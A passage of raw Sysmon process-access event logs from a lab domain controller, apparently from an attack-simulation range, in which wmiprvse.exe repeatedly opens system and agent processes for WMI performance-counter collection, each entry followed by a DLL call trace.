13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005033Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005032Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005031Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005030Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005029Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005028Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005027Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005026Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005025Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005024Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005023Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005022Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005021Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005020Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005019Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005018Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program 